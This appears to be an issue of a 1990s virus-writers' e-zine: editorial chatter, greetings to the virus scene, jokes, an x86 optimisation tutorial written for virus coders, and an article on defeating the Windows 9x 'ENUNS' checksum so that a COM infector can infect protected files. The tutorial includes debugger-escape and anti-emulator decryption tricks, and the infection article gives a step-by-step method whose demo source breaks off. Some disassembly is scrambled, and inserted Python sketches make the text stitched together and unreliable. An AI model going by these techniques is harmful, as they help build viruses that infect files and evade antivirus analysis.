Yo, dudez and girl (yes gigabyte, this is you :) here it goes. After a looong period of time and a lot of announced release datez, the day of the dayz is here. A small big Xmas present for all of you fearing the y2k breakdown, windoze NT security-hole programmers (like M$'s), avers whose terror of viruses rises from day to day, cut'n'paste coders, reverse engineers, and of course you - virus coderz. First we have to apologize for the late (really late) issue, mainly due to undelivered stuff that was already promised (not mentioning our laziness and busyness). But we think two and a half years is just the right period for releasing mags. Sure not. But we are going to change our policy, and for this reason this is most probably our second and last(!) mag released. We are not quitting, but watch and be nicely surprised. (at least we hope ;-) As in the first issue, we aren't aiming for quantity but for quality. So there aren't many viruses, but the quality of the articles and presented viruses will compensate for it excellently.
How to contact us
To get in touch with us, you can contact us by e-mail at
[email protected] - all your emails containing suggestions, questions or support are welcome. Of course, you can contact us directly and/or personally, if you know us :) Because we don't. For secure communication please use this pgp key - as you know, enemies are everywhere, do not trust anyone. But you can trust us. Secret government agencies are watching all around (echelon, for example), including messages like these. So don't be trapped by some of them, take appropriate countermeasures.
Our crew
Article gathering/maintenance ............ Flush, Navrhar, MGL/SVL
Graphics'n'design'n'mastering ............ Flush
Notes to first issue
I really wondered that no one was able to solve the puzzle in our first issue, and that nobody contacted us even with a note that he had read the "secret message". In fact, it wasn't quite secret - it is visible on the main page, yes, it is the hex-dump above the PCB. There are no cpu instructions in it but a message in hacker-script.
Greetz Virus scene Benny / 29A - calm down dude and don't get busted, & thx 4 help. btw: how about not focusing on unimportant features on your page, but tu supply a real stuff (nothing in there now)
Prizzy / 29A - no matter how greatfully it sounds, but what it actually does :) (yer crypto thingy) Duke / [SMF] - changed to av side ??? good idea - you can make fortune from removing .bat viruses ;-))) Lord Julus - nice educational work, you outrunned us ;-) Metabolis QuantumG, Qark - its usual to greet VLAD members :) VicodinES good luck and take some books to shorten the time at holidays Chris Pile tell to Vic how it goes Virogen put your page up again Recoder what is updated on your vx page? Cicatrix keeep VDAT up to date .... go on with your work VirusBuster - r u henpecked? publish some details! :) Vecna congratz, Babylonia rules (but still some important things missing that beats you up) .... what 'll you bring as next? RAID definatelly, you should learn ASM :-P Peon you've completelly missed idea of Navrhar. That's why your disassembly is just nothing. sorry ;-) Kevin welcome back soon Antivirus scene dark_wade / Lynx wondering how a antivirus reseller (whose company was intented to bust vyvojar, for example!) can be opped on #virus ?! ????????? / ?????? thanx for interview l- aren't u too old for thing all around today? Eugene Kaspersky / AVP - if you wanna be a NAI rival, don't you need a banner on our site as well? Vesselin Bontchen / Fare u still alive? there is nearly noone now who can quarrel guys on Secure av scene
Thank you for paying attention (and for all the fish as well). Hope you found at least something interesting in our second and seems to be last issue. But we are not quitting, so keep watching our site. *-zine editors. P.S. Donations of spirits, beer or money are welcomed anytime.
Windows 95/98: "32-bit extensions and a graphical shell for a 16-bit patch to an 8-bit operating system originally coded for a 4-bit microprocessor, written by a 2-bit company that can't stand 1 bit of competition."
Whoever is the genius in the advertisement department at Microsoft, they have done it this time. Anybody seen the IE ads on TV that started in 1997? The one with very effective choral music playing in the background? Well, the background music is the Confutatis Maledictis from Mozart's Requiem (Mass for the dead). And the words of the final blast of music which accompanies "Where do you want to go today?" are "confutatis maledictis, flammis acribus addictis..." which means "the damned and accused are convicted to flames of hell". Is this the right message for an ad?
Just being curious about f/win 4.21g I looked a little bit inside. And can you imagine my surprise? What do you think I found inside? (wwpack protection removed by cup386 ver 3.20) This nice piece of text has been found: * Welcome! If you read this, you have just give me the proof that my opinion about you is correct. You are one of these bastards that think cracking or stealing other people hard work is just the right way to go (like the authors of HMVS and PERFORIN seem to think). Well, I can`t stop you. But I watch and wait. And never forget... *
Another interesting piece of AV software is HMVS. If someone takes a look, there are interesting things to see in there...
"There is no reason anyone would want a computer in their home." --Ken Olsen, president, chairman and founder of Digital Equipment Corp., 1977
"But what...is it good for?"
--Engineer at the Advanced Computing Systems Division of IBM commenting on the microchip, 1968.
"I think there is a world market for maybe five computers." --Thomas Watson, chairman of IBM, 1943.
Unix is an operating system, OS/2 is half an operating system, Windows is a shell, and DOS is a boot partition virus. -- Peter H. Coffin
Q: Why do PCs have a reset button on the front? A: Because they are expected to run Microsoft operating systems.
The software said it requires Windows 95 or better, so I installed Linux
If NT is your answer, you don't understand the question
USER, n.: The word computer professionals use when they mean "idiot".
Where a calculator like the ENIAC is equipped with 18,000 vacuum tubes and weighs 30 tons, computers in the future may have only 1,000 vacuum tubes and weigh only 1 1/2 tons. -- Popular Mechanics, March 1949
C isn't that hard: void (*(*f[ ])( ))( ) defines f as an array of unspecified size, of pointers to functions that return pointers to functions that return void.
Why do programmers get Halloween and Christmas mixed up? Because OCT(31) == DEC(25)
PROGRAM - n. A magic spell cast over a computer allowing it to turn one's input into error messages.
Every asm coder wants to produce fast, short and efficient code. In asm language things should always be pushed to the limits. Imagine, 58 bytes are enough to display a color PCX file on the screen, 2 bytes can cause a system restart etc... Virus coders especially should produce tight and effective code; it is not a very pleasant thing to see unoptimized virus code. Sometimes optimisation can spare a couple of hundred bytes - a good reason to deal with this interesting topic.
Index
0. What is optimization
A. Opening words
B. Uninitialized data
C. Register settings in various situations
D. Putting 0 in register
E. Test if register is clear
F. Putting 0FFh in AH, 0FFFFh in DX and CX
G. Test if registers are 0FFFFh
H. Using EAX/AX/AL saves bytes
I. MOV vs. XCHG
J. 16 bit and 8 bit registers
K. Registers and immediate operands
L. Segment registers playground
M. The string instructions
N. DEC/INC vs SUB/ADD plus SI/DI
O. SHR/SHL
P. Procedures
Q. Multiple pops/pushes
R. Object code
S. Structure of code
T. Arithmetics with SIB (LEA)
0. What is optimization
Optimization is the process of making something more efficient, more reliable, faster or better and less buggy. In programming this means faster execution of the program, reduction of its size etc. Coding viruses is mostly programming in assembly, thus producing fast and short code. But everything can be done better, and even assembly code can be written shorter. Some tips are included in this tutorial.
A. Opening words
There are some things you should really avoid in your programs, no matter whether it is a virus or some utility. First of all remove all unnecessary code - in a good program there should be no NOPs. Another good tip is to examine the jumps in the program - try to find out whether some JMP NEAR can be replaced by JMP SHORT. A good test is to remove the JUMPS directive at the beginning of the source code. Forward references are bad for optimization; they produce unnecessary NOPs in some cases:

B9 0014 90      mov cx, buffer_size
14*(??)         buffer: db 20 dup (?)
=0014           buffer_size equ $-buffer

We get a better result with multiple passes (/m switch):

B9 0014         mov cx, buffer_size
14*(??)         buffer: db 20 dup (?)
=0014           buffer_size equ $-buffer
A very bad idea is to calculate at run time some weird value which could be calculated directly in the source code using operators and parentheses.
B. Uninitialized data
Viruses often need some memory, e.g. for loading the original EXE header. This could be done with the following code (similar code can often be seen in viruses):

                call read_header
                call process_it
                .....
buffer:         db 18 dup (?)
                .....
read_header:    mov ax, 4200h
                xor cx, cx
                cwd
                int 21h
                mov cx, 18
                mov dx, offset buffer
                mov ah, 3Fh
                int 21h
Well, as you can see, if you place the uninitialized data somewhere inside the body of your virus, the resulting code is larger than necessary. Therefore avoid placing uninitialized variables, structures or buffers in the code. All the mentioned things should be placed on the heap. To see an example of how it should not look, just take a look at your COMMAND.COM - in the one from DOS 6.22 as well as from Windows 98 you will see a lot of zeroes near the EOF. That code is especially poorly optimized. Try to use something like

virus_code_end  label near
buffer:         db 1024 dup(?)
C. Register settings in various situations
There are some interesting situations, like executing an EXE or COM file or booting the computer. As one can expect, the register setting is not random but very deterministic. Virus authors can take advantage of this default setting by testing some registers for their "on run" value. Take a look at tables 1 and 2 for the values which are set by MS-DOS for us.

Table 1 - COM and EXE files
reg  default value        reg  default value
AX   0000h (usually)      BP   091Ch
BX   0000h                SP   SP
CX   00FFh                DS   PSP
DX   PSP                  ES   PSP
SI   IP                   SS   SS
DI   SP                   CS   CS (PSP in COM)

Table 2 - At the boot time *
reg  default value        reg  default value
AX   0201h                BP   7C00h
BX   7C00h                SP   7BFCh
CX   0001h                DS   0
DX   0080h                ES   0
SI   0005h                SS   0
DI   7C00h                CS   0
* as to Ender's tests, this might varry from bios to bios, however it remains constant for one machine (or bios version). You
can use it as some sort of snapshot taken at first boot time, and then used for example in decryptor. Antivirus will not be able at all to guess these numbers without reboot and it will not be able correctly decrypt poly virus in mbr. (Quite nice Ender's idea, isn't it?)
As we all know Turbo Debugger sets all general registers to 0. When we some perform operation like xor ... cmp jne ...
cx, bp some code not affecting cx cx, 93Eh TD_is_here no debuger here
This way virus can easy escape from debugger. But on good writtten emulation system we are without any chance because they (AV) know we know and they are ready. But we can easy top all the wannabies trying to "research" our virus and give them the fun they want to have.
D. Putting 0 in register
1. Clearing whatever register
The usual way of clearing a register is

B8 0000         mov ax, 0       ; costs 3 bytes

33 C0           xor ax, ax      ; is more optimised
2B C0           sub ax, ax      ; only 2 bytes !

The above mentioned approach can be used every time you need it. Under Win32 the optimization is even more efficient, just take a look at the following piece of code:

B8 00000000     mov eax, 0      ; costs 5 bytes
33 C0           xor eax, eax    ; costs only 2 bytes
2B C0           sub eax, eax
Now we will take a sneak peek at some specific situations.
2. Clearing AH
Let's assume the situation where we need to clear the AH register. Generally we will do it this way:

B4 00           mov ah, 0       ; costs 2 bytes in DOS
2A E4           sub ah, ah      ; is the same
32 E4           xor ah, ah

but if the AL value is less than 80h we can save a byte (DOS)

98              cbw

while under Windoze the cbw will be assembled as

66 98           cbw

3. Clearing DX
We use the same approach as with AH. If the value in AX is < 8000h we can use

99              cwd

to clear DX.
4. When is CX clear?
It is absolutely useless to use code like

                ....
                loop some_label
                xor cx, cx      ; or even worse - mov cx, 0

because after the exit from a loop (I do not mean a hard or conditional jump out of the loop) the CX register is already cleared, as it is after the REP ??? operations.
E. Test if register is clear
1. General situation
A normal, uneducated coder will use this code:

3D 0000         cmp ax, 0       ; which takes 3 bytes
83 FB 00        cmp bx, 0

but a hard core programmer will for sure use

0B C0           or ax, ax       ; this takes only 2 bytes
0B DB           or bx, bx

If the value can be discarded we can save another byte:

48              dec ax          ; this is only 1 byte
4B              dec bx

This sets the sign flag for us if the register was zero. Note that DEC also sets the sign flag for values 8001h..0FFFFh, so this trick is usable only when the register is known to hold at most 8000h. The situation under Windoze is similar:

83 F8 00        cmp eax, 0
0B C0           or eax, eax
66| 0B C0       or ax, ax       ; this is not the default operand size
2. The CX register
In x86 processors the CX register is used as a counter, and the instruction set supports this use.

E3 ??           jcxz some_label

jumps when CX is zero, so we do not need to compare CX with zero. But demo coders especially should pay attention to the fact that this instruction is relatively slow.
F. Putting 0FFh in AH, 0FFFFh in DX and CX
If AL >= 80h, cbw sets AH to 0FFh. If AX >= 8000h, cwd puts 0FFFFh in DX. As for CX, after the exit from a loop this register is set to 0, so

                ....
                loop some_label
                dec cx          ; CX is 0 here, this sets it to 0FFFFh
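The sign-extension behaviour of CBW and CWD, and the wrap-around of DEC on a zero register, can be checked with a small model. This is only an illustrative sketch in Python, not part of the original article; the function names `cbw`, `cwd` and `dec16` are hypothetical helpers that mimic the 16-bit instructions. Note that the boundary values 80h and 8000h already have their top bit set.

```python
def cbw(al: int) -> int:
    """Model of CBW: sign-extend AL into AX and return the 16-bit AX."""
    al &= 0xFF
    ah = 0xFF if al & 0x80 else 0x00   # AH is filled with the top bit of AL
    return (ah << 8) | al


def cwd(ax: int) -> int:
    """Model of CWD: return the DX produced by sign-extending AX."""
    return 0xFFFF if ax & 0x8000 else 0x0000


def dec16(value: int) -> int:
    """Model of DEC on a 16-bit register (wraps around at zero)."""
    return (value - 1) & 0xFFFF


if __name__ == "__main__":
    for al in (0x00, 0x7F, 0x80, 0xFF):
        print(f"AL={al:02X}h -> AX={cbw(al):04X}h")
    print(f"CX=0000h, dec cx -> {dec16(0):04X}h")
```

Running it prints the resulting AX for a few AL values on both sides of the 80h boundary.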
G. Test if registers are 0FFFFh
If we need to test whether 2 registers both hold 0FFFFh and the value of one of them is not needed afterwards, we can easily do it with e.g.

23 C3           and ax, bx
40              inc ax
74 ??           jz a            ; 5 bytes altogether

instead of

3D FFFF         cmp ax, 0ffffh
75 ??           jnz a
83 FB FF        cmp bx, 0ffffh
75 ??           jnz a           ; making 10 bytes
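Why the AND/INC pair works: the AND result is all ones only if both operands are all ones, and only an all-ones value wraps to zero when incremented. A minimal sketch in Python (not from the original article; `both_all_ones` and `check_exhaustively` are hypothetical names) models this and verifies it exhaustively for an 8-bit register width, since the argument is the same for any width.

```python
def both_all_ones(a: int, b: int, width: int = 16) -> bool:
    """Model of 'and a, b / inc a / jz': True when the zero flag would be set."""
    mask = (1 << width) - 1
    return (((a & b) + 1) & mask) == 0


def check_exhaustively(width: int = 8) -> bool:
    """Compare the trick against the direct test for every pair of values."""
    mask = (1 << width) - 1
    return all(
        both_all_ones(a, b, width) == (a == mask and b == mask)
        for a in range(mask + 1)
        for b in range(mask + 1)
    )


if __name__ == "__main__":
    print(both_all_ones(0xFFFF, 0xFFFF))   # both registers hold 0FFFFh
    print(both_all_ones(0xFFFF, 0xFFFE))   # one register differs
    print(check_exhaustively(8))
```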
H. Using EAX/AX/AL saves bytes
Opcodes for some types of instructions are shorter when you use AX or AL instead of any other register. This is the case for instructions like:

MOV reg,mem
A1 0084         mov ax, word ptr ds:[84h]       ; 3 bytes
8B 1E 0084      mov bx, word ptr ds:[84h]       ; 4 bytes
A0 0084         mov al, byte ptr ds:[84h]       ; 3 bytes
8A 26 0084      mov ah, byte ptr ds:[84h]       ; 4 bytes each
8A 3E 0084      mov bh, byte ptr ds:[84h]

MOV mem,reg
A3 0084         mov word ptr ds:[84h], ax       ; 3 bytes
89 1E 0084      mov word ptr ds:[84h], bx       ; 4 bytes
A2 0084         mov byte ptr ds:[84h], al       ; 3 bytes
88 26 0084      mov byte ptr ds:[84h], ah       ; 4 bytes each
88 3E 0084      mov byte ptr ds:[84h], bh

CMP reg,value
3D 04D3         cmp ax, 0D304h                  ; 3 bytes
81 FB 04D1      cmp bx, 0D104h                  ; 4 bytes
3C 22           cmp al, 34                      ; 2 bytes
80 FC 22        cmp ah, 34                      ; 3 bytes each
80 FF 22        cmp bh, 34
I. MOV vs. XCHG
Moving a value from one register to another can be replaced with XCHG, but only in cases where the value left in the source register is not important. As expected, the AX register is the better choice here too.

8B C3           mov ax, bx      ; 2 bytes
93              xchg ax, bx     ; 1 byte

The following code is of equal size

8A C3           mov al, bl
86 C3           xchg al, bl

8A E6           mov ah, dh
86 E6           xchg ah, dh     ; 2 bytes all

but you can even enlarge the code with:

A1 0080         mov ax, word ptr ds:[80h]       ; 3 bytes

87 06 0080      xchg ax, word ptr ds:[80h]      ; 4 bytes
86 06 0080      xchg al, byte ptr ds:[80h]      ; this is bad
J. 16 bit and 8 bit registers
I doubt there is any non-newbie coder who will use code ala

B0 10           mov al, 10h
B4 20           mov ah, 20h

which takes 4 bytes, while doing the same at once with

B8 2010         mov ax, 2010h

takes only 3 bytes.
K. Registers and immediate operands
Immediate operands cost more bytes than the use of registers. Just look at the example below:

C6 06 010C 00   mov byte ptr [10Ch], 0          ; 5 bytes
88 3E 010C      mov byte ptr [10Ch], bh         ; 4 bytes
A2 010C         mov byte ptr [10Ch], al         ; 3 bytes
L. Segment registers playground
1. Avoid using non-default segments
If you use a non-default segment register for the operation, a segment prefix will be generated, which adds 1 byte to the size of the code. With BP in the address the default segment is SS, so:

3E: 8B 86 0100  mov ax, word ptr ds:[100h][bp]  ; 5 bytes (DS prefix)
8B 86 0100      mov ax, word ptr ss:[100h][bp]  ; 4 bytes

2. Moving from segment register to segment register
We can't move a value directly from one segment register to another. It has to be coded ala

8C C8           mov ax, cs
8E D8           mov ds, ax

with a length of 4 bytes, but

0E              push cs
1F              pop ds

takes only 2 bytes.
M. The string instructions
Intel prepared instructions like LODS, STOS, MOVS, SCAS, CMPS to handle large amounts of data. One has to know what these instructions do. Below are the instructions and their equivalents.

AC              lodsb
8A 04           mov al, byte ptr ds:[si]

AD              lodsw
8B 04           mov ax, word ptr ds:[si]

66| AD          lodsd
66| 8B 04       mov eax, dword ptr ds:[si]

LODS type instructions save 1 byte in comparison with MOV.

AA              stosb
26: 88 05       mov byte ptr es:[di], al

AB              stosw
26: 89 05       mov word ptr es:[di], ax

66| AB          stosd
66| 26: 89 05   mov dword ptr es:[di], eax

STOS type instructions save 2 bytes in comparison with MOV. Therefore the MOVS instruction saves 3 bytes (it is the same as LODS followed by STOS).

AE              scasb
26: 3A 05       cmp al, byte ptr es:[di]

AF              scasw
26: 3B 05       cmp ax, word ptr es:[di]

66| AF          scasd
66| 26: 3B 05   cmp eax, dword ptr es:[di]

SCAS type instructions save 2 bytes in comparison with CMP. The CMPS instruction does the same as

                LODSB/LODSW/LODSD
                CMP AL/AX/EAX, byte/word/dword ptr ES:[DI]

thus we save 3 bytes with CMPS. We should not forget the REP prefixes - using these 1 byte sized prefixes we can do miracles at almost no cost. In addition, after REP ??? CX is set to 0.
N. DEC/INC vs SUB/ADD plus SI/DI
Incrementing or decrementing a 16bit register is only 1 byte in size. It is more efficient than INC/DEC of an 8 bit register, or adding or subtracting 1 from some address or register.

40              inc ax
FE C0           inc al

4A              dec dx
FE CE           dec dh

2D 0001         sub ax, 1
05 0001         add ax, 1

83 2E 0080 01   sub word ptr ds:[80h], 1
FF 0E 0080      dec word ptr ds:[80h]

83 06 0080 01   add word ptr ds:[80h], 1
FF 06 0080      inc word ptr ds:[80h]

Even if we need to add/subtract 2 from a register, using inc/dec twice is 1 byte shorter. For SI/DI, if AX doesn't matter, we can use some of the string instructions for INC/DEC (depending on the direction flag).
O. SHR/SHL
SHR/SHL instructions can be used for division/multiplication by 2/4/8 etc. instead of DIV/MUL instructions. While with DIV/MUL we have to fill a register with the needed value, we can instead of

B1 04           mov cl,4
F6 E1           mul cl          ; 4 bytes in total

use just

C0 E0 02        shl al,2

to multiply AL by 4 and save a byte here (keep in mind that MUL leaves the full 16 bit result in AX, while SHL keeps only the low 8 bits in AL). If we are multiplying just by 2, we can save 2 bytes because

D0 E0           shl al,1

has a size of only 2 bytes.

P. Procedures
If some code is used over and over again, it is very clever to put such a piece of code in a procedure. It can save some valuable bytes, but we have to say that in other cases this could also add some bytes to the code. How can you decide whether putting the code in a procedure saves bytes? Let the number of repeated uses of some piece of code be N, its size be S, and the number of saved or lost bytes be A. When the code is not part of a procedure, its total size will be N*S. But when we put the code in a procedure, the resulting size of the code will be

        (S+1) + N*3 + A

which should be understood as (the size of the code + ret) + N*3 bytes for the calls + the difference. And the resulting equation is

        N*S                 = (S+1) + 3*N + A
        N*S - 3*N - (S+1)   = A
        N*(S-3) - S - 1     = A
From the formula above you can clearly see that any repeated code of 3 bytes or less can not be usefully replaced by a procedure in the process of optimisation. When we know the size of the code (which should be at least 4 bytes) and the number of repetitions, we can estimate the number of saved bytes. So, for code with a length of 4 bytes we save 1 byte if the code is repeated 6 times and put in a procedure. The next thing you can do with procedures is to use multiple entry points for the same procedure.
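The formula A = N*(S-3) - S - 1 is easy to tabulate. The following is a minimal sketch in Python (not part of the original article); `bytes_saved` and `min_repeats` are hypothetical helper names, and the 3-byte near CALL and 1-byte RET are the sizes assumed in the text.

```python
def bytes_saved(n: int, s: int, call_size: int = 3, ret_size: int = 1) -> int:
    """Bytes saved (positive) or lost (negative) by moving a fragment of
    s bytes that is repeated n times into a procedure."""
    inline_total = n * s
    procedure_total = (s + ret_size) + n * call_size
    return inline_total - procedure_total


def min_repeats(s: int, limit: int = 1000):
    """Smallest repeat count at which the procedure starts to save bytes,
    or None if it never does (for example when s <= 3)."""
    for n in range(1, limit + 1):
        if bytes_saved(n, s) > 0:
            return n
    return None


if __name__ == "__main__":
    for size in (3, 4, 5, 8, 16):
        print(f"S={size:2d}: pays off from N={min_repeats(size)}")
```

For S = 4 this reports N = 6 as the first repeat count with a gain, which agrees with the example in the text.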
Q. Multiple pops/pushes
Sometimes a situation arises where you need to repeat a lot of pushes or pops a couple of times. If your thinking goes in the direction of "procedure", it goes the right way. But with the push/pop instructions there is one little problem - they manipulate the stack pointer, just as CALL does. But the instruction set provides a solution - the JMP register instruction. We can handle multiple pushes/pops like this:

                call push_reg
                ...
                ...
push_reg:       pop si          ; pop return address
                push ax
                push cx
                push dx
                push bx
                jmp si          ; this does what ret normally does
R. Object code Some opcodes are in some memory models aren't accesible. Therefore to use some workaround. Most typical use of object code in virus if famous return to original dos handler: back dosadr
db dd
9ah ?
; this is for JMP FAR PTR ; and here comes the adress
Another nice use of object code is let's say in decryptor ala: xor
ax, key
but as the every copy of virus will have different key, we code this instruction as key:
db dw
35 ?
which will work perfectly.
S. Structure of code
This is really what optimisation is about. If you structure your code well you can save a lot of bytes. If you are using a lot of procedures, do not forget to check the input and output registers. Sometimes it can be valuable to use a register which costs fewer bytes to handle in procedures. As an example of well structured code, look at this part of an INT 21h handler for some hypothetical virus. Pay attention to the use of the call instruction here:

86 C4           xchg al,ah
E8 0007         call jump_there

40              db 40h
021Ar           dw offset write
3E              db 3eh
0458r           dw offset close
00              db 0                    ; end of table

jump_there:
5F              pop di                  ; pointer to table begin
search:
80 3D 00        cmp byte ptr ds:[di],0
74 08           je exit                 ; table end ?
AE              scasb                   ; AL = AH ?
74 03           je handle
AF              scasw                   ; DI = DI + 2
EB F5           jmp short search
handle:
FF 25           jmp word ptr ds:[di]    ; jump to function
exit:
The size of the code above is 26 bytes. Every additional handled function adds just 3 further bytes. But when we use the sequence of CMP, JE/JNE, JMP typical for viruses, it will look like:

80 FC 40        cmp ah, 40h
75 03           jne check_3e
E9 022D         jmp infect
check_3e:

thus we have to count at least 8 bytes for every single handled function. If we want to handle 10 functions, it will be as much as 80 bytes. The structured coding from the previous example will fit the same functionality in only (26+3*8) = 50 bytes. 30 bytes saved - do I have to further explain all the pluses structured coding can bring to you?
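The size comparison between the table-driven dispatcher and the compare chain can be worked out for any number of handled functions. A small sketch in Python (not from the original article; the function names are hypothetical, and the constants 26, 3 and 8 are the byte counts quoted in the text, where the 26-byte version already contains two table entries):

```python
def table_dispatch_size(functions: int, base: int = 26,
                        base_entries: int = 2, entry_size: int = 3) -> int:
    """Size in bytes of the table-driven dispatcher for a given number of
    handled functions (1 byte function number + 2 byte offset per entry)."""
    return base + entry_size * (functions - base_entries)


def compare_chain_size(functions: int, per_function: int = 8) -> int:
    """Size in bytes of the CMP / JNE / JMP chain (3 + 2 + 3 bytes each)."""
    return per_function * functions


if __name__ == "__main__":
    for n in (2, 4, 5, 10, 20):
        table, chain = table_dispatch_size(n), compare_chain_size(n)
        print(f"{n:2d} functions: table {table:3d} bytes, chain {chain:3d} bytes")
```

Under these assumptions the two variants are equal in size at four functions, and the table wins for anything larger.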
T. Arithmetics with SIB (LEA)
There is another way on i386+ to simplify more complicated arithmetical operations. The SIB byte of an instruction (used for complex memory access) can be used for arithmetics as well, using the LEA instruction. SIB means Scale, Index, Base, which is the general form of memory addressing:

89 84 CB 12345678       mov [ecx*8+ebx+12345678h], eax

Here ECX is the Index register, which is multiplied by the Scale factor (1, 2, 4 or 8), EBX is the Base register (another 32bit register), and finally 12345678h is a raw displacement. The displacement is a 32bit value as well and takes another 4 bytes, but the addressing can also be used without this constant. You can use it for arithmetical operations; it is often faster than comparable equivalents using multiplication or shifts, and you can perform a multiplication even by non-standard values, like eax*9, for example:

8D 04 C0                lea eax, [eax*8+eax]

As you can see, this lea-trick can be used in many circumstances, and I'll not list them all here, of cos.
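What LEA computes can be modelled as base + index*scale + displacement, truncated to 32 bits. The following is only an illustrative sketch in Python (not part of the original article); `lea` is a hypothetical helper that mirrors the addressing form, and it shows which multipliers a single LEA with the same register as base and index can reach.

```python
MASK32 = 0xFFFFFFFF


def lea(base: int = 0, index: int = 0, scale: int = 1, disp: int = 0) -> int:
    """Model of 'lea reg, [base + index*scale + disp]' on a 32-bit CPU."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("scale must be 1, 2, 4 or 8")
    return (base + index * scale + disp) & MASK32


def times(eax: int, factor: int) -> int:
    """Multiply by 2, 3, 5 or 9 the way 'lea eax, [eax*scale+eax]' would."""
    scale = factor - 1
    return lea(base=eax, index=eax, scale=scale)


if __name__ == "__main__":
    eax = 7
    for factor in (2, 3, 5, 9):
        print(f"eax*{factor} = {times(eax, factor)}")
```

With the base register omitted, the same form also gives plain multiplication by 2, 4 or 8.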
I hope this little introduction helps you with some ideas, but you surely know: "the truth is out there" - you need to optimize your code in a more general context, not only at the instruction level, but in register usage and stack usage as well, and there are many other things that can't be described in such a general way. Maybe that is for another article. But for now, go ahead and don't let your code be pessimised...
Introduction In the old goodtimes there were nothing easier as infecting COM file. But the Microsoft went to market with his Windoze 9x series of betas. This has changed some COM files and near the EOF we started to see string 'ENUNS' followed by word with various value. This is apparently some kind of checksum or other security shit. Many virus coder solved the this problem simply by avoiding the infection of such a modified COM files.
Research part But as we all know, Microsoft is lame company and its programmers are morons. So let's take a closer look what does such a ENUNS file in action. We will pick up a handy and short file from directory C:\WINDOWS\COMMAND - file choice.com If we 'll play a little bit with hex editor and we 'll add some extra bytes to the end of the file, after running CHOICE.COM without any command line parameters, we will see [ , ]?
instead of the usual [Y,N]?
This means - file is corrupted ... Let's start debuging this file. After couple of jumps and calls we land in following code cs:0B27 cs:0B28 cs:0B29 cs:0B2A cs:0B2C cs:0B2F cs:0B32
1E 06 1F 8B 83 B8 CD
D7 C2 03 00 3D 21
push push pop mov add mov int
ds es ds dx, di dx, 3 ax, 3D00h 21h
The code above opens the file which is run (choice.com) cs:0B34 cs:0B35 cs:0B37 cs:0B39 cs:0B3D cs:0B40 cs:0B41 cs:0B44 cs:0B48 cs:0B4A cs:0B4B
1F 72 8B 89 E8 9C B8 8B CD 9D 72
pop 3C jb D8 mov 1E 77 05 mov 3F 00 call pushf 00 3E mov 1E 77 05 mov 21 int popf 2C jb
ds error bx, ax handle, bx test_ENUNS ax, 3E00h bx, handle 21h loc_0_B79
Call to the test_ENUNS seem to be quit important. Closer look shows what this procedure does: cs:0B7F cs:0B80 cs:0B82 cs:0B84
06 33 C9 33 D2 83 EA 07
push xor xor sub
es cx, cx dx, dx dx, 7
cs:0B87 cs:0B8A cs:0B8D cs:0B8F cs:0B92 cs:0B94 cs:0B97 cs:0B9A cs:0B9E cs:0BA1 cs:0BA5 cs:0BA7
83 B8 CD B9 03 83 A3 89 B8 8D CD 72
D9 02 21 07 C1 D2 80 16 00 16 21 1A
00 42 00 00 05 82 05 3F 92 05
sbb mov int mov add adc mov mov mov lea int jb
cx, 0 ax, 4202h 21h cx, 7 ax, cx dx, 0 size_lo, ax size_hi, dx ax, 3F00h dx, ds:592h 21h bad_handle
The routine seek to EOF-7 and read last 7 bytes of the file to some buffer. Filesize is saved on this occasion. cs:0BA9 81 3E 95 05 4E 53cmp cs:0BAF 75 12 jnz
word_0_595, 'SN' bad_handle
Location EOF-4 is checked for presence of string 'NS'. cs:0BB1 cs:0BB4 cs:0BB8 cs:0BBC cs:0BBE
A1 8B 8B 2B 83
97 16 0E D0 D9
05 80 05 82 05 00
cs:0C07 89 0E 80 05 cs:0C0B 89 16 82 05
mov mov mov sub sbb
ax, dx, cx, dx, cx,
checksum size_lo size_hi ax 0
mov mov
size_lo, cx size_hi, dx
Word at location EOF-2 is subtracted from the file size and result is stored. cs:0C0F cs:0C12 cs:0C15 cs:0C17 cs:0C1B cs:0C1F cs:0C21 cs:0C24 cs:0C26 cs:0C29 cs:0C2A
BE E8 73 8B 8B 33 E8 72 E8 07 C3
01 16 0F 0E 16 F6 07 03 7F
00 00 80 05 82 05 00 00
mov call jnb mov mov xor call jb call pop retn
si, 1 sub_0_C2B loc_0_C26 cx, size_lo dx, size_hi si, si sub_0_C2B loc_0_C29 sub_0_CA8 es
From our (virus) point of the view is decising the call to cs:0xC2B. cs:0C2B cs:0C2C cs:0C2D cs:0C30
51 52 B8 00 42 CD 21
push push mov int
cx dx ax, 4200h 21h
File pointer is moved to the location (filesize-(word at EOF-2)) cs:0C32 cs:0C35 cs:0C37 cs:0C3B cs:0C3D cs:0C3F cs:0C41
B9 B4 8D CD 72 3B 75
10 00 3F 16 92 05 21 37 C1 33
mov mov lea int jb cmp jnz
cx, 10h ah, 3Fh dx, ds:592h 21h loc_0_C76 ax, cx loc_0_C76
Read form inside the file is performed. cs:0C43 A1 9D 05 cs:0C46 3D 4E 53 cs:0C49 75 2B
mov cmp jnz
ax, word_0_59D ax, 'SN' loc_0_C76
Location inside the file is checked for presence of string 'NS'. This is what the program does with the magic 'ENUNS' shit. Quit lame and interesting at the same time. Well as we know what the does, we should try to create some workaround.
What do we need? There are two requests for elegant solution of the problem 1. User should see at the EOF-7 the string 'ENUNS' followed by word containing "magic value". 2. File has to pass its internal controll routine.
Solution We take common non-overwriting appending COM infector. If we choose some ENUNSed targed and we will infect it in normal way, the proggy with virus on its end will have no 'NS' at EOF-4. In the very rare case it will have 'NS' there, word at EOF-2 sends the file pointer somewhere in deep space 9 and the next check will fail. Therefore solution of the problem is 1. Read last 7 bytes of file to some buffer 2. Infect the file as usual 3. Handle ENUNS protection As we need to have at least 'NS' at EOF-4, in the line of our elegant solution we will add there 'ENUNS' string. Then we need to adapt the word at EOF-2 in such a way it will point to the location it pointed before the file was infected. The word located at EOF-2 is subtracted from file size - it could be expressed as follows uninfected situation: X = filesize - (word at EOF-2) but when the file is infected the situation is X + virus size + added code = filesize + virus size +added code - (word at EOF-2) Resulting pointer is now "somewhat" incorrect from our viral point of the view. This dramatic equation is easy to solve just by moving some shit from left to right side of the equation... X = filesize + virus size +added code -(word at EOF-2+ virus size+ added code) note: under the term "added code" you should understand our 2nd 'ENUNS??' string.
Dear readers, the solution for the ENUNS problem is just to copy the last 7 bytes from the target file to the end of the virus body with only one change - to the value of last word in the file we simply add the size of all appended code including our duplicite ENUNS?? string. And here comes the demonstration of the above mentioned solution.
ENUNS.ASM
model tiny codeseg org 100h ; ; ; ; ; ; ; ; ; ; ; ; CR LF
